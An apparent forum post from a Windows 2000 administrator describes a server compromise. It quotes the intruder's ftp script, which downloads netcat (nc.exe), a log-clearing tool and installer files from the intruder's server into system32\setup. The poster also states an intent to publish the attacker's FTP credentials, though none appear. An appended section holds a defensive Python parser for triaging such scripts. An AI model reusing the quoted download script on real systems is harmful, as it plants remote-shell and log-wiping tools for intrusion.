Yesterday, a douche bag managed to hack my Windows 2000 server. The hacker
managed to upload some setup files to system32\setup folder. In the setup
folder, he uploaded some scripts. Using the scripts, the hacker downloaded
a few files from his FTP server. He managed to install three Windows
1. Windows logon service (Sounds pretty standard Windows 2000 service). The
program, netstart.exe runs from system32\setup folder.
2. TCP-IP (Sounds normal enough). The program runs from system32\setup
3. ****-U (This one is not so normal). The program runs from system32\setup
He also managed to erase my event logs. I have no idea what damage he has
already done. However, I managed to find his footsteps in time. I now
know his IP address, the user id and password to his FTP server. I tried to
report to Microsoft. I wanted to report the incident to Microsoft, so that
they can find out how the hacker hacked my server, and close any other
vulnerabilities Windows 2000 has. Apparently, Bill (Gates, that is) is still
not serious enough about the security. The call went to India. They wanted
to return my call in 3-5 business days. I insisted on talking to someone
higher-up. I got a guy named Mike, who spoke with Russell Crowe's accent
and asked me to report this incident to local law enforcement authority. As
much of a law-abiding citizen as I am, I know that my local law enforcement will
look at me as nothing more than a looney tune. Anyway, folks, here is the
douche bag's FTP server, user id, and password.
This is the script the hacker ran. Note that the FTP server is at port 34816.
open 34816
lcd C:\winnt\system32\setup
get regsvr32.dll
get TzoLibr.dll
get netstart.exe
get space.txt
get readme.txt
get liesmich.txt
get clearlogs.exe
get syslog.exe
get syslog.ini
get install.cmd
get nc.exe
I am posting to save some of you the aggravation I went through, and to bring
this douche bag to justice.
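
Added example, not part of the original post: a small triage parser for an ftp command script like the one above, which extracts the server, port, local directory and fetched files and flags the traits visible in this incident. The host name in the sample is a constructed placeholder, and the function name and flagging rules are assumptions made for illustration.

```python
import ntpath

# Extensions treated as executable or loadable on Windows (assumed list).
EXEC_EXT = {".exe", ".dll", ".cmd", ".bat", ".vbs"}
STANDARD_FTP_PORT = 21

# Constructed sample: file names and port are from the post, the host is a
# placeholder because the post does not show it.
SAMPLE = r"""open ftp.example.invalid 34816
lcd C:\winnt\system32\setup
get regsvr32.dll
get TzoLibr.dll
get netstart.exe
get space.txt
get readme.txt
get liesmich.txt
get clearlogs.exe
get syslog.exe
get syslog.ini
get install.cmd
get nc.exe
"""

def triage_ftp_script(text):
    """Parse an ftp command script; return (summary, findings)."""
    summary = {"host": None, "port": STANDARD_FTP_PORT, "local_dir": None, "files": []}
    findings = []
    for raw in text.splitlines():
        parts = raw.split()
        if not parts:
            continue
        cmd, args = parts[0].lower(), parts[1:]
        if cmd == "open" and args:
            summary["host"] = args[0]
            if len(args) > 1 and args[1].isdigit():
                summary["port"] = int(args[1])
        elif cmd == "lcd" and args:
            summary["local_dir"] = " ".join(args)
        elif cmd in ("get", "recv") and args:
            summary["files"].append(args[0])  # first argument is the remote file
    if summary["port"] != STANDARD_FTP_PORT:
        findings.append("non-standard FTP port %d" % summary["port"])
    local = (summary["local_dir"] or "").lower().replace("/", "\\")
    if "\\system32" in local:
        findings.append("downloads land under the system directory: " + summary["local_dir"])
    execs = [f for f in summary["files"] if ntpath.splitext(f)[1].lower() in EXEC_EXT]
    if execs:
        findings.append("executable content fetched: " + ", ".join(execs))
    return summary, findings
```

Calling `triage_ftp_script(SAMPLE)` returns the parsed summary plus one finding each for the port, the download directory and the executable files.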